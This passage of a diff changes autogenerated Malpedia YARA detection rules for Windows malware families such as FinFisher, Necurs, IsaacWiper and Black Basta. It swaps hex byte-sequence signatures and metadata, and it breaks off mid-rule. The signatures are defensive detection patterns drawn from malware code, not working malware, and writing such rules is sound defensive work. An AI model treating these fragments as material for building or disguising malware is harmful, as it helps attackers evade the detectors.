 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5c1d0a0a-c7b7-560c-afbd-cff397912aa2"
+		id = "21b775d6-fc03-5dd6-a228-147ffaddc7f0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spider_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spider_rat_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.voidoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.voidoor_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "91b51e3f34e8589c66f7bc8774754ce78933dd5fa4cfa89093817c8c758e1ad5"
+		logic_hash = "3d15a11c9349ebbd78b8b5ac32c650a51c9ca8251bf91feba17b7b25a2692cb6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85598,32 +85547,32 @@ rule MALPEDIA_Win_Spider_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 493bce 7415 488b01 4d8bc5 ba01000000 ff5020 8bd8 }
-		$sequence_1 = { 833903 b801000000 756e 397104 7569 488b4908 4885c9 }
-		$sequence_2 = { e8???????? cc 488d88c0000000 488d15b2f7ffff e8???????? 8bce 483bc6 }
-		$sequence_3 = { 7433 488bc8 833904 7517 44396104 7511 }
-		$sequence_4 = { 4c8be8 c64424305c 41b901000000 4983c8ff 488d542430 488bce e8???????? }
-		$sequence_5 = { 0fb601 8807 48ffc1 48ffc7 84c0 75f1 49837d2010 }
-		$sequence_6 = { 4883ec20 488d05df860200 488bf9 488901 4883c118 e8???????? 488b5718 }
-		$sequence_7 = { 488b4c2440 488d542478 488b01 ff5018 413bc6 8bd8 0f8c4c010000 }
-		$sequence_8 = { b890900100 e8???????? 482be0 48c7442448feffffff 488b05???????? 4833c4 4889842480900100 }
-		$sequence_9 = { 664489442420 4533c9 4c8d05322a0200 418b9424f0000000 ff5030 488b8c2420010000 488b01 }
+		$sequence_0 = { 740d 83cb40 eb66 81cb80000000 eb5e 83cb20 eb59 }
+		$sequence_1 = { 83c404 837c241000 7509 55 e8???????? 83c404 5b }
+		$sequence_2 = { c786a805000002000000 5e c3 83f901 74bf 68???????? 50 }
+		$sequence_3 = { c7461807000000 eb36 803f0a 756d 47 83c3ff c7461807000000 }
+		$sequence_4 = { 0f8498000000 83f801 0f848f000000 83f8ff 0f8486000000 f6470c82 7551 }
+		$sequence_5 = { e8???????? 83c404 85c0 0f8547010000 817e782c010000 0f8cdc000000 39850c030000 }
+		$sequence_6 = { ff33 ffd6 ff7304 ffd6 8b4c243c 5f 5e }
+		$sequence_7 = { e9???????? 8d8de8fdffff e9???????? 8d8d48feffff e9???????? 8b8d78fcffff e9???????? }
+		$sequence_8 = { c78424e005000001010101 c78424e405000001010101 66c78424e80500000100 33c9 8bff 8a848c08050000 3422 }
+		$sequence_9 = { e9???????? 57 33ff 8bcf 894de4 8bc7 3998f8f14b00 }
 
 	condition:
-		7 of them and filesize < 1107968
+		7 of them and filesize < 1744896
 }
-rule MALPEDIA_Win_Kamasers_Auto : FILE
+rule MALPEDIA_Win_Finfisher_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c1a7cc0c-2e35-5239-9e79-174b829766cd"
+		id = "3bd8079e-f604-51ea-b8f2-fef52df0002f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kamasers"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kamasers_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.finfisher_auto.yar#L1-L140"
 		license_url = "N/A"
-		logic_hash = "bc9204b6b1cca7a86ddf29783e99c6413f2a7179ee494a096a7a149c0e384519"
+		logic_hash = "36bd2bd78748a7bd0a2049fe313cd0daa82b47af68134d330004d325ff7392ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85637,32 +85586,36 @@ rule MALPEDIA_Win_Kamasers_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c414 ebe1 8b55ec 8b4de8 8b04957885f904 807c082800 7d55 }
-		$sequence_1 = { 7602 8b06 8a4c3a04 80f13f 884c1004 83c205 83fa19 }
-		$sequence_2 = { 7776 51 52 e8???????? 83c408 c745e400000000 c745e80f000000 }
-		$sequence_3 = { 33c0 0f57c0 c78558feffff02000000 0f118548feffff 66898548feffff ba0f000000 88854afeffff }
-		$sequence_4 = { ffb5b4dbffff 8d85f0efffff f7d1 50 ffb5f8dbffff 66898dfaefffff ff95b0dbffff }
-		$sequence_5 = { 8b85e8fdffff 83f80f 7634 8b95d4fdffff 8d4801 8bc2 81f900100000 }
-		$sequence_6 = { 0f85be000000 8d4dd4 e8???????? 50 8d4d98 e8???????? 8b4de8 }
-		$sequence_7 = { 6a01 68???????? 8d8d40edffff c645fc13 e8???????? c785fcd8ffff00000000 }
-		$sequence_8 = { 0f875c070000 51 52 e8???????? 83c408 837de80f }
-		$sequence_9 = { 8bc8 2bcf b8abaaaa2a f7e9 8b4b04 c1fa02 2bcf }
+		$sequence_0 = { 57 56 8d85ccf9ffff 50 }
+		$sequence_1 = { 68???????? 6804010000 8d85ccf9ffff 50 }
+		$sequence_2 = { 8d85bcf7ffff 50 6a01 56 56 }
+		$sequence_3 = { 0f855b040000 8b85b0f7ffff 8b400c 8b8db8f7ffff 8908 89bda0f7ffff }
+		$sequence_4 = { 6a04 56 ff15???????? 8bd8 3bdf 7561 }
+		$sequence_5 = { e8???????? b982000000 8bf7 8dbddcfdffff f3a5 }
+		$sequence_6 = { 48 7526 8b4508 8b4028 }
+		$sequence_7 = { 56 53 50 ff15???????? eb05 }
+		$sequence_8 = { 8d45f4 50 53 897508 e8???????? }
+		$sequence_9 = { 8bd8 ff15???????? 8845ff 897df8 }
+		$sequence_10 = { 8b7508 89b5ccfdffff 85f6 7508 }
+		$sequence_11 = { 8bd8 3bde 0f8583030000 66c78572f7ffff0401 }
+		$sequence_12 = { 6824020000 68???????? e8???????? 8b7508 }
+		$sequence_13 = { 897de4 56 e8???????? 50 }
 
 	condition:
-		7 of them and filesize < 906240
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Elirks_Auto : FILE
+rule MALPEDIA_Win_Glooxmail_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "43457097-ea8b-5864-bbde-86ef37584143"
+		id = "69068c2d-618b-514f-89ee-0c12a27c7775"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.elirks_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.glooxmail_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "9b5bf7e4bf894eff89b4a5704e72b876af8697001a5b80ec9161e8abc0610ab3"
+		logic_hash = "fd925824bd22779b63be73d9209717bd4d4f69fd8a16644a721055340873e4d2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85676,32 +85629,32 @@ rule MALPEDIA_Win_Elirks_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894608 5f 5e 81c40c020000 c3 }
-		$sequence_1 = { 0f848b010000 8b742414 8b15???????? 6a00 8d442440 50 }
-		$sequence_2 = { 56 8d7e08 57 8d442420 50 8d4c241c 51 }
-		$sequence_3 = { 52 8d5104 83c0ff 52 }
-		$sequence_4 = { 8d4c2414 51 8bd1 52 ff15???????? f605????????02 742c }
-		$sequence_5 = { 52 6a00 8bc3 e8???????? 85c0 7515 }
-		$sequence_6 = { 6a0c 50 b908000000 8bc7 e8???????? 8bf0 83c408 }
-		$sequence_7 = { 0f8592000000 f605????????08 a1???????? 53 8b1d???????? }
-		$sequence_8 = { 8b1d???????? 8b2d???????? 8b8120c20000 6aff 50 }
-		$sequence_9 = { e8???????? 85c0 7414 8b44241c 8d542410 }
+		$sequence_0 = { 8d55c0 52 8d9564ffffff c645fc4a 8b01 52 ff5044 }
+		$sequence_1 = { e8???????? 385df3 7407 c745ec40000000 68???????? 8d8d7cffffff e8???????? }
+		$sequence_2 = { 6a01 8d8c24f0020000 81e3fff7ffff e8???????? f7c300040000 740f 56 }
+		$sequence_3 = { 8d4dd8 e9???????? 8b4d08 e9???????? 8b4508 054c040000 e9???????? }
+		$sequence_4 = { 814df000020000 68???????? 8d4db4 e8???????? 8d85b8feffff 50 8d45b4 }
+		$sequence_5 = { 83a50cfffffff7 8d8d30feffff e9???????? c3 8d4db8 e9???????? 8d8dd8feffff }
+		$sequence_6 = { 8bfb e8???????? 33f6 33ff 56 47 57 }
+		$sequence_7 = { 895dcc f645d008 740e 8365d0f7 53 57 8d4d84 }
+		$sequence_8 = { ff750c 83a424bc00000000 8d442430 50 e8???????? }
+		$sequence_9 = { e8???????? c78424600800006d000000 f744241000000080 7417 81642410ffffff7f 53 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 761856
 }
-rule MALPEDIA_Win_Isaacwiper_Auto : FILE
+rule MALPEDIA_Win_Afrodita_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a82e3ec4-c6b5-5b3d-9ab0-3064ec3e836c"
+		id = "0b89d48b-e8eb-5aec-a4a1-cb25be8e6ea8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.isaacwiper_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.afrodita_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "8d7d093defd2064582c177175fbd158891b23ac1a28e0ebb5ab5f45a7b73a475"
+		logic_hash = "ba96a282578cd431adb4de4c63175081873626ab508dce847aa3397ecdd6e0da"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85715,32 +85668,32 @@ rule MALPEDIA_Win_Isaacwiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bc8 737f 2bf9 8b4c2430 3bcf 0f8245020000 }
-		$sequence_1 = { 03c2 3bc3 8b5df4 72d5 eb37 83f802 }
-		$sequence_2 = { 83e03f c1f906 6bf038 03348de8670310 837e18ff 740c 837e18fe }
-		$sequence_3 = { 83c408 3bc3 8d48ff 0f46c1 014658 837e5815 7368 }
-		$sequence_4 = { 8b03 51 c744243007000000 8bcb 7445 ff501c 8d442430 }
-		$sequence_5 = { 50 c7460800000000 c7461000000000 c7461400000000 e8???????? 83c404 }
-		$sequence_6 = { 3914c598c00210 7408 40 83f81d }
-		$sequence_7 = { e8???????? 8ac8 83c404 46 83c768 84c9 75e4 }
-		$sequence_8 = { 8b4d0c 83d900 8945e0 894ddc c745f800000000 897dd8 895df4 }
-		$sequence_9 = { 69c9dfb00899 33ca 338c8634060000 890c86 40 3de3000000 72cf }
+		$sequence_0 = { 50 ff75dc e8???????? 83c40c 84c0 0f84aa030000 }
+		$sequence_1 = { 52 53 ff7508 8b4004 c645fc01 8b4c3038 8b01 }
+		$sequence_2 = { e8???????? 83c404 c645fc09 8d8d6cffffff ff75a0 e8???????? 83e3df }
+		$sequence_3 = { 6a7d 8d4d80 53 e8???????? e9???????? 83ff4d 0f8443010000 }
+		$sequence_4 = { 33c8 8b45f0 3345e4 23c7 8b7ddc 3345e4 03c8 }
+		$sequence_5 = { 837d1000 8b10 0f444d10 51 56 }
+		$sequence_6 = { 2345e4 03ca 3345f4 03c1 8945e4 85db 7437 }
+		$sequence_7 = { 51 8d4b04 ff5008 68???????? 50 8d45c0 c745fc00000000 }
+		$sequence_8 = { 7445 833d????????00 743c 56 6a10 8d45ec 50 }
+		$sequence_9 = { e8???????? eb05 e8???????? 83c404 8b9564ffffff 399560ffffff 8bb568ffffff }
 
 	condition:
-		7 of them and filesize < 467968
+		7 of them and filesize < 2334720
 }
-rule MALPEDIA_Win_Necurs_Auto : FILE
+rule MALPEDIA_Win_Turian_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "86cbd739-582e-5cdb-a27a-e3c4138c2a5e"
+		id = "55f5d82f-afb8-5814-b531-1c9c01e3bde2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.necurs_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turian"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.turian_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "39922dfc2893e9d4c51db465a227b3ce728857825f7b204e465cc4626e505419"
+		logic_hash = "91e36be52281255f5afb4546bb919f97cb536e7671085e0b38ecf9a977103ea1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85754,39 +85707,33 @@ rule MALPEDIA_Win_Necurs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8bf2 ba06e0a636 f7e2 }
-		$sequence_1 = { 13f2 a3???????? 8935???????? 890d???????? 8bc1 }
-		$sequence_2 = { 33d2 030d???????? a3???????? a1???????? }
-		$sequence_3 = { 397508 7604 33c0 eb12 }
-		$sequence_4 = { 890d???????? 8bc1 5e c3 55 8bec }
-		$sequence_5 = { 46 f7f6 8bc2 034508 5e 5d c3 }
-		$sequence_6 = { 0f31 8bc8 a1???????? 56 }
-		$sequence_7 = { 33c0 eb12 e8???????? 2b7508 }
-		$sequence_8 = { 8d85ecfbffff 57 50 e8???????? 83c410 }
-		$sequence_9 = { 33d7 33c1 52 50 }
-		$sequence_10 = { ffd6 8bf8 59 59 85ff 74df }
-		$sequence_11 = { 5e 5f c9 c3 8b35???????? }
-		$sequence_12 = { 99 6848640300 68da279b71 33d7 }
-		$sequence_13 = { 8bc1 8bd7 e9???????? 83caff 8bc2 e9???????? }
-		$sequence_14 = { 57 57 57 8d8574ffffff 50 }
-		$sequence_15 = { 8bc1 0bc7 7409 8bc1 8bd7 e9???????? }
+		$sequence_0 = { 5b 81c420040000 c3 8d442410 6a10 50 }
+		$sequence_1 = { 33db 3bc3 7519 668b44240c 881d???????? 891d???????? }
+		$sequence_2 = { 5e c3 8bc8 57 c1e105 }
+		$sequence_3 = { 85c0 0f840affffff 5f 5e 5d 33c0 }
+		$sequence_4 = { 83c9ff 33c0 668b15???????? f2ae }
+		$sequence_5 = { 8d4c2410 51 e8???????? 8bbc24a0000000 83c404 a1???????? }
+		$sequence_6 = { 51 52 ffd5 85c0 7423 a1???????? 43 }
+		$sequence_7 = { 83f810 7e6a 6a00 57 53 }
+		$sequence_8 = { 56 57 730c 5f }
+		$sequence_9 = { 8b442414 50 ffd7 56 ff15???????? 83c404 33c0 }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 645120
 }
-rule MALPEDIA_Win_Wndtest_Auto : FILE
+rule MALPEDIA_Win_Zupdax_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fa7e1d3e-ff37-533f-8f3a-ddc800dad583"
+		id = "de5aa4fa-5f17-5443-8ded-540bc4f1be04"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wndtest_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdax"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zupdax_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "e52dae40ef4794c37daf120253466cc3a5d1ee85941c6b51e3b69e035267f66f"
-		score = 50
+		logic_hash = "eb046345ff3af30eb975f6808cc5770691e59266f20f528282b1aa4111a1c56b"
+		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
@@ -85799,32 +85746,32 @@ rule MALPEDIA_Win_Wndtest_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89461c 8907 894704 894708 89470c 894710 }
-		$sequence_1 = { 8945fc eb03 8b45fc 8b5d08 }
-		$sequence_2 = { 53 6a00 ff15???????? 6a0d ff15???????? }
-		$sequence_3 = { 8b4de8 41 51 e8???????? 83c404 }
-		$sequence_4 = { 5e 8be5 5d c3 880c3e 5f 5e }
-		$sequence_5 = { 6805010000 e8???????? 83c404 6804010000 8bd8 53 6a00 }
-		$sequence_6 = { 33c9 8d460a ba02000000 f7e2 0f90c1 f7d9 }
-		$sequence_7 = { 50 56 ffd7 a3???????? 8b0d???????? 8b15???????? }
-		$sequence_8 = { 46 895dfc 3b750c 7cbe 5f }
-		$sequence_9 = { c3 880c3e 5f 5e }
+		$sequence_0 = { e8???????? 83c408 8b06 50 895e0c 895e10 }
+		$sequence_1 = { 8b4c2408 8b7e28 51 e8???????? 8b5624 52 e8???????? }
+		$sequence_2 = { 56 57 33c9 33f6 33ff 394c2414 }
+		$sequence_3 = { 7522 e8???????? 8b0d???????? 51 8b0d???????? }
+		$sequence_4 = { e8???????? 83c408 8b4618 50 895e24 }
+		$sequence_5 = { 51 e8???????? 83c418 8bc6 c3 }
+		$sequence_6 = { 895e2c e8???????? 8b460c 83c404 3bc3 }
+		$sequence_7 = { 52 e8???????? 83c408 8b06 50 895e0c 895e10 }
+		$sequence_8 = { 3bc3 7419 8b4c2408 8b7e28 51 }
+		$sequence_9 = { 8d4618 6a00 50 c706ffffffff }
 
 	condition:
-		7 of them and filesize < 901120
+		7 of them and filesize < 1032192
 }
-rule MALPEDIA_Win_Tokyox_Auto : FILE
+rule MALPEDIA_Win_Bubblewrap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d34e4ceb-0bc2-5477-9c12-3a529f2527e6"
+		id = "8af5c082-aa6b-50c2-beb7-d15cea5a0e28"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tokyox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tokyox_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bubblewrap_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "a5f77c70b1ac6566e10c0515d32c74e5ec77d8ebaa8bcecbb1bfc331f53b6f71"
+		logic_hash = "9768a3ec06517eeb8d4ed3cf1b68ed17318c56d44232a674eb24375a5c01ec8d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85838,32 +85785,32 @@ rule MALPEDIA_Win_Tokyox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 0f84b6010000 8d4590 }
-		$sequence_1 = { e8???????? 8b4508 83c40c b90d0a0000 66890c07 }
-		$sequence_2 = { c745f450726f64 50 6a00 8d45f4 c745f87563744e }
-		$sequence_3 = { 0f842e020000 8d4df0 c745fc00000000 51 }
-		$sequence_4 = { 8d45f8 50 6a05 ff7608 ffd7 6a3c ff7510 }
-		$sequence_5 = { 51 56 6a00 68e9fd0000 ff15???????? 8945e4 33db }
-		$sequence_6 = { 7534 83f801 721f 66a1???????? 8d5601 }
-		$sequence_7 = { 8bec a1???????? 3b05???????? 0f85a10f0000 ff7508 e8???????? 59 }
-		$sequence_8 = { 8bf2 c745a046003400 c745a435003000 c745a831002d00 c745ac46003400 c745b034004700 c745b42d003400 }
-		$sequence_9 = { ff15???????? 894608 85c0 754e ff15???????? 8b4e08 }
+		$sequence_0 = { 83c9ff f2ae f7d1 49 c605????????ee c605????????03 }
+		$sequence_1 = { c21000 55 68???????? 6a01 6a00 ff15???????? }
+		$sequence_2 = { 8915???????? 8b15???????? a3???????? 66a1???????? 880d???????? b910000000 }
+		$sequence_3 = { 8bca 89442414 83e103 55 }
+		$sequence_4 = { 83e103 f3a4 8dbc24ac000000 83c9ff }
+		$sequence_5 = { e8???????? 83c408 be???????? b8???????? 8a10 }
+		$sequence_6 = { c1e902 f3a5 8bca 83e103 f3a4 be???????? b8???????? }
+		$sequence_7 = { 8bc1 894c2414 3bc5 0f821cffffff 8b6c2424 b967010000 33c0 }
+		$sequence_8 = { 8b0d???????? 8b15???????? 894c0435 b920000000 8d742434 bf???????? }
+		$sequence_9 = { 8b15???????? f2ae f7d1 49 bf???????? }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 57136
 }
-rule MALPEDIA_Win_Webc2_Ausov_Auto : FILE
+rule MALPEDIA_Win_Evilgrab_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f7dcd3a-83e3-51b1-b972-c6423fd03466"
+		id = "262a5f1e-fc32-5e23-bc68-1916bf6229d5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_ausov_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.evilgrab_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "54e3ad7a65c1020ea5947e1b7fb8d16c99e374f254cf080dd27feb76035c9b99"
+		logic_hash = "f2b39911d0e0c2e89edee53b595cd7abbfb96f83612f1946b2208648a7f155b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85877,32 +85824,32 @@ rule MALPEDIA_Win_Webc2_Ausov_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83854cfaffff02 80bd46faffff00 75ae c78540faffff00000000 eb0b 1bc0 83d8ff }
-		$sequence_1 = { 0f8407000000 0f8501000000 f8 8b550c }
-		$sequence_2 = { b941000000 33c0 8dbda9faffff f3ab }
-		$sequence_3 = { 7546 80bd47faffff00 7431 8b8548faffff 8a4801 888d46faffff }
-		$sequence_4 = { 0355f4 0fbe4201 3345f4 8945fc 0f8407000000 }
-		$sequence_5 = { 6a00 8d85a8faffff 50 8d8dbcfcffff }
-		$sequence_6 = { 85c9 740d 85c0 7409 5f 5e }
-		$sequence_7 = { 6a00 68???????? 8d85f8fbffff 50 e8???????? 83c408 50 }
-		$sequence_8 = { 0f8501000000 f8 68???????? 8d8dfcfbffff 51 e8???????? 83c408 }
-		$sequence_9 = { ffd3 8bf0 85f6 0f8487000000 8b3d???????? }
+		$sequence_0 = { 8b08 50 ff5108 83c8ff e9???????? 8b442410 50 }
+		$sequence_1 = { ff15???????? 894320 83f8ff 741e c785dce6ffff00000000 c6431601 6a46 }
+		$sequence_2 = { 0f8437feffff 8b442418 50 ff15???????? 5f 5e }
+		$sequence_3 = { 68ff000000 e8???????? 8bd0 b93f000000 33c0 8bfa f3ab }
+		$sequence_4 = { 55 56 3bc2 57 bd01000000 0f84ef010000 }
+		$sequence_5 = { c78514f6ffff00000000 b8???????? c3 8b8df0f5ffff 8b5124 89951cf6ffff b8???????? }
+		$sequence_6 = { ff8db4adffff 0f856dffffff 8d8dc0d2ffff 51 8bcb e8???????? e9???????? }
+		$sequence_7 = { 57 8d8de8adffff 51 8d95dcadffff 52 8d85e0adffff 50 }
+		$sequence_8 = { 33db 3bfb 7469 8b771c 3bf3 7462 395f20 }
+		$sequence_9 = { 83f802 0f84ca000000 83f801 7567 3be8 750b 56 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Dragonbreath_Auto : FILE
+rule MALPEDIA_Win_Blackbasta_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dce0b381-95ab-5aa0-a119-0eedad899009"
+		id = "5bbce9ec-7d54-5002-bc1c-a1c1392e7297"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dragonbreath"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dragonbreath_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackbasta_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f0cd4604abe67553fcedb3fe371f55dd5d5d8e023a81a960ca3c6bc06a72d951"
+		logic_hash = "f2cab8177edfb4bc6b2c56a6c1db15098f849335780d0e48121fe5285763e5dd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85916,32 +85863,32 @@ rule MALPEDIA_Win_Dragonbreath_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c410 eb14 8d8590fdffff 50 }
-		$sequence_1 = { 68???????? 8d4da8 51 e8???????? 8b7de4 }
-		$sequence_2 = { 8b5dd0 ebab c745e470820110 817de47c820110 7311 }
-		$sequence_3 = { 33db 8945c8 895dcc 895dd0 c745e80f000000 895de4 885dd4 }
-		$sequence_4 = { 2bcf b879787878 f7e9 c1fa07 8bf2 }
-		$sequence_5 = { 8dbd84fcffff 68ff010000 f3a5 8d8df5fdffff 6a00 51 }
-		$sequence_6 = { c1e006 8b0c8d80fb0110 8d440104 8020fe ff36 e8???????? 59 }
-		$sequence_7 = { e8???????? 85ff 7407 57 ff15???????? 8b8558fdffff 8b4df0 }
-		$sequence_8 = { 51 ff15???????? 46 3bb424dc110000 72e8 e9???????? }
-		$sequence_9 = { 8bd6 69d200a4d9fa 03ca b8b17c2195 f7e1 8bda c1eb15 }
+		$sequence_0 = { 7447 8d45d8 84d2 7402 8bc3 fe0430 eb33 }
+		$sequence_1 = { c745e4e48c0a10 8b4508 8bcf 8b7510 c745e004000000 dd00 8b450c }
+		$sequence_2 = { 42 895594 e9???????? 8b45ec c645fc0d 83f810 0f8293000000 }
+		$sequence_3 = { 52 8d5594 52 8b01 ff503c 50 8d8decfeffff }
+		$sequence_4 = { 83c404 807d6700 c645fc26 0f8481040000 8d45c4 33ff 50 }
+		$sequence_5 = { 83c404 8bce 50 e8???????? 83e3ef 895df0 c645fc0c }
+		$sequence_6 = { 8b4904 8b01 5d ff6048 2b49fc 83e970 e9???????? }
+		$sequence_7 = { 6af6 ff15???????? 8b049d58cc0c10 8b4dfc 897c0118 33c0 5f }
+		$sequence_8 = { e9???????? 397d34 7768 ffb564ffffff 8d4d0c e8???????? 8b4d8c }
+		$sequence_9 = { e8???????? 03c6 13d7 8b75e4 3bd6 7f7a 8b4dec }
 
 	condition:
-		7 of them and filesize < 295936
+		7 of them and filesize < 1758208
 }
-rule MALPEDIA_Win_Minipocket_Auto : FILE
+rule MALPEDIA_Win_Toughprogress_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4bfe3841-9649-5ffe-8c95-c50da79d5d8c"
+		id = "f7aead55-8a03-5bbf-af11-1841c77b5719"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minipocket"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.minipocket_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.toughprogress"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.toughprogress_auto.yar#L1-L134"
